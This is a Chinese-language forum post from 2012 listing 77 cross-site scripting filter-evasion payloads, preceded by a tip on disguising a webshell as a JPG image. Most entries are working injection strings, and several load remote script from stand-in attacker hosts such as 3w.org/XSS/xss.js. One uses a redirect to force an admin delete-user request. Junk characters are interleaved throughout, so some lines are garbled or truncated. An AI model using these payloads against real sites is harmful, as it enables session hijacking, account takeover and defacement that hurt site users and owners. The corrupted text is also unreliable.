跨站图片shell8 y6 T J( M" q' _% `& S
XSS跨站代码 <script>alert("")</script>
1 w2 [) g- p6 @* e+ n, K2 d d# D/ ~1 | o# ?- ?
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马( ~5 ?0 J( |) l' z @3 G5 T0 S
% ~3 j/ t, L' \5 K3 U! w8 L
- _" v+ l7 ^% q: Y6 @$ k% b# k
& H& e& Z2 A5 X% L$ h1)普通的XSS JavaScript注入! u( {& A; l- f
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>% q- d- X6 M% v' o! B4 R2 G9 s. }( u
1 M8 A' u9 c5 i: ~9 z
(2)IMG标签XSS使用JavaScript命令% z$ q1 P7 S6 X" b$ W R; \
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 e( t, p& p/ N) t* L1 U' Z: t) C$ b
# @' G8 S* n$ ?) Z' `(3)IMG标签无分号无引号
+ S) t4 d5 Z" r0 b<IMG SRC=javascript:alert(‘XSS’)> z2 E9 i5 X; C$ D% s
5 J/ k% _- V. k: j
(4)IMG标签大小写不敏感
. q5 |( w' a& q4 F; S) l: W/ P<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) `7 T; d( L3 Y; r% A" W
7 a& z+ I& u @ O) g! l7 Z
(5)HTML编码(必须有分号)5 w3 } M) w2 G. b) L
<IMG SRC=javascript:alert(“XSS”)>6 e6 v `" h% K! R
) M# u4 r, j* {) Q$ O0 P(6)修正缺陷IMG标签2 ]/ f7 V$ T8 O% J: ^
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>9 p5 _, y6 D- o0 _$ f: x
8 ~* q5 n% |+ D% z
(7)formCharCode标签(计算器)9 W" H: _; i3 _; O
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>8 ]. X; L9 J- K6 F) W) D- v6 a
7 ]: H. [: u H* |7 _) Y" a
(8)UTF-8的Unicode编码(计算器)
4 _+ w4 D2 ]$ C+ s; N1 T3 [<IMG SRC=jav..省略..S')>
c* Z/ v7 F( o3 B- M% X' g. J, e% S% w( o7 g
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)+ T" Z( h$ T6 t$ [
<IMG SRC=jav..省略..S')>( m; X9 j+ {& D1 ]9 L- X( m- f
4 C; b3 e3 s n- n( }8 y(10)十六进制编码也是没有分号(计算器)
, b9 m, N/ C o/ B<IMG SRC=java..省略..XSS')>
6 h: {! {) V( B# a2 W/ D( S( q5 F6 n
(11)嵌入式标签,将Javascript分开
! w' j6 C5 o/ `; Q; w% I) B<IMG SRC=”jav ascript:alert(‘XSS’);”>) P4 w: J1 @6 y# t) x
5 |+ m2 W; W* N2 |& e(12)嵌入式编码标签,将Javascript分开
. x8 F: Z+ w; F. P5 V) ^6 q<IMG SRC=”jav ascript:alert(‘XSS’);”>% [+ i: y. O* t; D# {4 K% M r! D
- V4 E! {: Q5 ~' |" l4 A
(13)嵌入式换行符
3 W5 E* H0 a }& P<IMG SRC=”jav ascript:alert(‘XSS’);”>
" U0 |& J. _7 `) N' h; I% T8 |' v, b; h
(14)嵌入式回车. o0 q4 @6 j, y8 x" A
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 t% c G/ D( z# m8 C( g
8 o3 b4 C! [6 W% t, k
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
4 R8 c/ f7 a3 W<IMG SRC=”javascript:alert(‘XSS‘)”>1 Y' n B1 N# \
6 Z* y" ?" E- V+ X6 E1 P% `(16)解决限制字符(要求同页面); ^' S& u' Q! Q8 R) D$ L5 `! x' B) ~
<script>z=’document.’</script>( S! L! I' }, H3 A: n Z' K6 F
<script>z=z+’write(“‘</script>
, z% ?2 }7 U0 {9 i' p4 ^6 p<script>z=z+’<script’</script>
/ [) D. B: E5 C<script>z=z+’ src=ht’</script>
8 Y- L' c0 A L0 K: \8 K) T* z. V<script>z=z+’tp://ww’</script>
) r) ^0 b& z x<script>z=z+’w.shell’</script>* W. F- G) u9 v6 j
<script>z=z+’.net/1.’</script>) ?1 D2 @2 E; H% V) l) ^
<script>z=z+’js></sc’</script>
0 R6 r) l/ [/ W9 _9 X<script>z=z+’ript>”)’</script>
8 g8 h7 O) R3 k% [8 [<script>eval_r(z)</script>
8 c& x6 j: g2 _6 p
- o5 @8 L3 \7 s: |2 O(17)空字符
! r. h! k7 n" iperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
, [4 `% x, O' M1 ?" s
6 O) G& R0 I" R- h& i(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
% A. `: ]2 s, R* Tperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out) t: R' G. x9 ^
& ^$ a& I( z, n2 C ?3 r2 P(19)Spaces和meta前的IMG标签
- M/ Q8 ~; l2 b1 \<IMG SRC=” javascript:alert(‘XSS’);”>' ?% m$ ^ A2 _! M1 z' e! l
% N6 l% W4 K4 t M8 `2 W; E, `(20)Non-alpha-non-digit XSS
\8 I" o( Q/ R- v& \- Q<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>2 a( X9 [1 T/ z; V% y7 h1 C
/ s* y- r w5 a/ z/ g) P9 P1 X0 A
(21)Non-alpha-non-digit XSS to 2
2 `! z( l/ U; l<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
+ B5 j; g, ]( r: F- }
& u0 f% p* v% `0 w/ r, z2 L) q(22)Non-alpha-non-digit XSS to 3& o% e4 _- P [! L9 v
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>: o9 L h5 |6 `
4 ]7 \) a6 f3 \$ E! C4 K, B
(23)双开括号: S% T/ J+ |. C, z' m: _
<<SCRIPT>alert(“XSS”);//<</SCRIPT>" p+ o: r2 k+ @ R
! r0 c. L. \' O* j! X. Z% m
(24)无结束脚本标记(仅火狐等浏览器)
: _4 Q; K0 X6 F) C. M<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>% m! r7 t& ^/ D& p2 D# Z
! c( @+ m5 [/ X5 Z+ m
(25)无结束脚本标记27 F/ D% ~' O j) B4 y+ [
<SCRIPT SRC=//3w.org/XSS/xss.js>
a: V& G7 _7 x& F9 U* \4 }2 z, s, m- A- H! i
(26)半开的HTML/JavaScript XSS
1 X$ ] s& V# A<IMG SRC=”javascript:alert(‘XSS’)”
4 t0 C# e/ d t7 L
! n& S; i$ \$ y0 Y(27)双开角括号
) @8 J1 ?+ \! M6 G1 g$ u<iframe src=http://3w.org/XSS.html <0 D/ D" P. Z2 F7 O5 L+ \: \
5 y# g* D+ O8 M' _$ d+ z3 \' ~. f" m(28)无单引号 双引号 分号
6 L$ ~+ e( o9 a- x$ }0 c<SCRIPT>a=/XSS// g! k6 _$ U& {6 m" N
alert(a.source)</SCRIPT>0 y# r; _; z; j3 |% C
2 C/ H* F, ~0 U! _- O% }(29)换码过滤的JavaScript
/ s. e) f$ ?# h+ t! u7 j* u\”;alert(‘XSS’);//
3 \) e" O6 g; c& k5 ^8 s: a6 I8 ^# K8 @
3 U+ m# ~8 z5 S; i( Z(30)结束Title标签
% |, L2 b/ `8 |7 V; t+ r. ?/ E9 z</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
9 q# z. P4 K( G3 E z n+ w$ z6 U* t' e; @$ p- i( @4 {
(31)Input Image U. y) ^, f6 C, _# ^' ^0 k; T0 F
<INPUT SRC=”javascript:alert(‘XSS’);”>$ U4 ^: y w4 V" A
6 U0 V7 k3 R {
(32)BODY Image$ l5 J! W }) w* W
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>4 B( D0 K; @: v% t
5 f8 t2 d: I( i6 F
(33)BODY标签
6 F" P6 `; {% h: [. G) ^* R8 l0 ^ W<BODY(‘XSS’)>( ?, \) F8 c; |# ?
+ Y3 {# O. K* d; i9 J$ p4 |(34)IMG Dynsrc
, C8 I- J% O6 k) X- d: B<IMG DYNSRC=”javascript:alert(‘XSS’)”>, X0 Z) w/ i- k( r" y9 Z* Y
6 [3 i3 |2 r6 r, N0 _; d8 @. p(35)IMG Lowsrc. B' L0 j" S2 h% J
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
/ v1 `' L, k' Y* d- n: ~" w# A! n3 T6 w; F8 |7 T' L+ o
(36)BGSOUND
1 `! d9 Y$ ?0 _+ i<BGSOUND SRC=”javascript:alert(‘XSS’);”>
" u& {1 d; v* @) G/ O* o! ]- I2 w- t" U5 p" C' W( ^
(37)STYLE sheet' M8 N& q+ ^( E6 S
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 \0 n% o8 \7 E$ M, `! ]) |3 x! E9 {: n
(38)远程样式表
; ?. {4 h2 @0 R/ H# v6 d& K<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
( R1 S5 U$ m# \7 w
7 I! E5 h2 T2 u# \" j8 T(39)List-style-image(列表式)
8 e: K; E) @6 q3 i4 F* ?<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
$ D) v# D, W' y5 L: D' W7 |/ v; x( a. C2 I# g5 u4 j8 E
(40)IMG VBscript
p6 ~! v% Y& m- ]; N& ]$ h( H7 ^7 S<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS0 v- x8 U5 b& V5 Y& s: U/ D
- t1 S+ W( i: q' Z% z, _* D(41)META链接url& @) H6 x- _" l
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
. |% y! a c" d! y5 ^$ @- F' ]# V# t
(42)Iframe& |6 a' n/ N0 K$ Z
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" A' c. d: ?3 O3 `, R" |4 S; x(43)Frame
5 G0 ~' f: e5 P a9 Q/ O% [$ g4 E: \<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>( o1 `/ g. f1 O5 X- y
4 O$ q3 ]3 f v8 P0 q, l6 T(44)Table
- }7 t) O5 S* h* g% E' f& L<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 A; {3 z9 K4 t6 b) @0 O; a
% y) O5 G5 k" A0 ?: `: U(45)TD8 d1 u; c! h Z8 _" B
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
; e) }, p4 z$ S/ f& F
% D8 f5 r( G1 m7 _(46)DIV background-image9 w5 X' y5 a2 O
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>) w# s6 Z1 [, P4 _9 V% l; c# f4 s
8 I* l9 X% F% |: _2 V& c+ c
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
6 o+ a; Q5 `( h: H8 s& I<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
3 a" z9 Q8 H, J4 D) e8 }: B) o* t4 A+ `
(48)DIV expression6 C/ ]2 ^; [' i; g8 ]# p
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>4 K' z! S5 {8 ]
; @% I* C4 }2 A4 U(49)STYLE属性分拆表达( @$ u0 F. X2 y2 ^# f8 i$ f& e! E
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>& [1 R* V" U9 d+ p6 U5 Y+ M8 _
& j( s( |: }9 n3 i1 r, ^" }(50)匿名STYLE(组成:开角号和一个字母开头)% J' C2 K& L* @4 ]; D. J
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
4 G, M. j9 K% n- \9 v( i" n/ c" X- M+ M. ~0 w0 g, U* W
(51)STYLE background-image
7 d2 q& G$ z* |* P! t<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
. ~: X/ r+ }* D2 j# h L4 \, r) f: c# |1 e! v" U' l# S8 E
(52)IMG STYLE方式
3 G, Y$ \2 e3 Kexppression(alert(“XSS”))’>$ T" j9 N; B; z+ D) m
, S: i, m0 p2 K(53)STYLE background
8 h- J- ]3 h N7 s" }' w! h; ~<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
. F5 O! m: @, f# n9 _6 Y7 c
/ M- R) O2 W2 U( F0 u `1 U(54)BASE3 ^1 j4 ]8 n4 S$ B) c
<BASE HREF=”javascript:alert(‘XSS’);//”>5 b; x" l' e; W% }9 s
$ y" }' ^4 v& l* {5 U* f" h(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS) B0 d5 L# E6 e- [
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>0 m4 @# q* p O3 L! |- ?
& I& v/ {) Z# w% Z+ m
(56)在flash中使用ActionScrpt可以混进你XSS的代码! ], p8 t& k l3 i0 @
a=”get”; n/ T0 \2 d$ n6 q
b=”URL(\”";! b) e! w; l4 S* f
c=”javascript:”;8 t/ `6 l! I% c
d=”alert(‘XSS’);\”)”;
1 w; c9 B% W, u, |eval_r(a+b+c+d);- |! v+ t8 Y) v* f! b0 B5 {5 p# k
" \. {% N3 A5 Y) q& k
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上( I; _) L, q) p7 ^# I% C7 p
<HTML xmlns:xss>
0 |2 x1 X0 O Q/ [9 o5 O/ s0 u( Z<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
- n- X8 e' {( e2 x; A, x<xss:xss>XSS</xss:xss>) B: b- s% R8 C0 a' q3 L6 P0 O
</HTML>
* b) I, \1 m. j5 T7 R9 p" o
! Z: B' ^% l) s" U, C6 g; E* c(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
; ~9 S2 E1 [$ P4 V<SCRIPT SRC=””></SCRIPT>; O; w3 K% t9 a* G/ s
; K i6 K1 h% h. G+ J1 I(59)IMG嵌入式命令,可执行任意命令
7 S3 b; Y, J [) G5 h<IMG SRC=”http://www.XXX.com/a.php?a=b”>
/ i2 [' W9 [* r$ x3 P
8 \4 c8 b7 ]% u0 V" n, H(60)IMG嵌入式命令(a.jpg在同服务器)4 J6 ~ h" [. D7 B: c7 j
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
) l. P/ s1 h* v+ C1 ^' w) ~- R6 k. \$ ^! @0 u
(61)绕符号过滤5 i1 j4 Z- O9 C1 H9 ?
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>/ }% I/ A- n# U0 M( h3 R
2 e) B" e4 @( w/ _& ^: I+ e
(62)1 y% v, o5 P& _% X) u% T
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# w& N4 X' ], i( t& v+ v, J! ^' R. I4 p% r1 J
(63)
" V# R( K/ b+ d7 y: I# I8 X N$ {<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
+ T$ r( l+ |& p& S2 ]' ]9 z( m1 ~& z
3 }' a/ O4 F2 X0 J5 G# T" O(64)" A1 \$ g; c: Z; R; W
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
5 q. b/ ^. b1 Z: [9 a h# y- T; v$ R3 y2 W5 ~% x* Z8 B( Z
(65)5 i1 y3 J J9 U5 {" T
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>( E* l% U7 w) [9 U+ o
* \2 H, g7 x. z! x( n4 @ c' O(66)
9 q# {3 z, ^- y: F, |% T<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ |1 n: B+ n/ F6 G+ t
+ ?, V! _6 \8 I(67)
7 s4 j$ B! t) E& E<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>, {# h5 N$ H& ~; G9 U6 U
- k9 ?, j2 r7 R9 [(68)URL绕行
, @# i. @: O% ?9 w6 q1 I<A HREF=”http://127.0.0.1/”>XSS</A>3 E7 y3 B3 f* n7 Q/ r
' p5 r$ ~1 c7 L6 ^9 R, l
(69)URL编码# O( p$ F9 O( O$ L+ @) D
<A HREF=”http://3w.org”>XSS</A>
0 |( F3 x' r* f9 p2 @7 {& a4 K4 e; d
(70)IP十进制
8 }/ A6 J# m4 s<A HREF=”http://3232235521″>XSS</A>$ P9 [, l' S5 W
3 H% l- I2 E! k% o
(71)IP十六进制/ w( T S* C. a: d% J* h
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
% Y1 r6 A" I; S2 ^& y
* A2 P( \0 S! \$ K(72)IP八进制
+ ^& x1 H# M6 k<A HREF=”http://0300.0250.0000.0001″>XSS</A>
- M$ S6 _. E, x. u
3 q% q7 a" ?8 z(73)混合编码
, W+ n9 `! i$ B5 y; @6 |<A HREF=”h
0 J; k2 D% g6 m5 B m- m0 ~tt p://6 6.000146.0×7.147/”">XSS</A>
. t- B0 K7 D) |8 K! e& q
' N* W" U( I! H" ]) R(74)节省[http:]! j( E: z% [) J
<A HREF=”//www.google.com/”>XSS</A>
/ S, ^& O$ E8 m$ E' g# l: h' U% c' q
* B& n$ f, v- A O(75)节省[www]% A8 H; }) {7 ^! q+ {
<A HREF=”http://google.com/”>XSS</A> {- i. z8 S$ L2 t/ P: R! L
0 g5 b# c8 V: n& [" Z# y7 ~$ @% ]
(76)绝对点绝对DNS! e1 @8 c: P6 S6 V8 l
<A HREF=”http://www.google.com./”>XSS</A>2 t+ n S; ~$ n
$ l* y5 D/ n! m7 _$ |! D(77)javascript链接" o4 F1 h F% Y
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
* m' W; y6 a% Z+ Q% h |
发表于 2012-9-13 17:04:56
收藏
支持
反对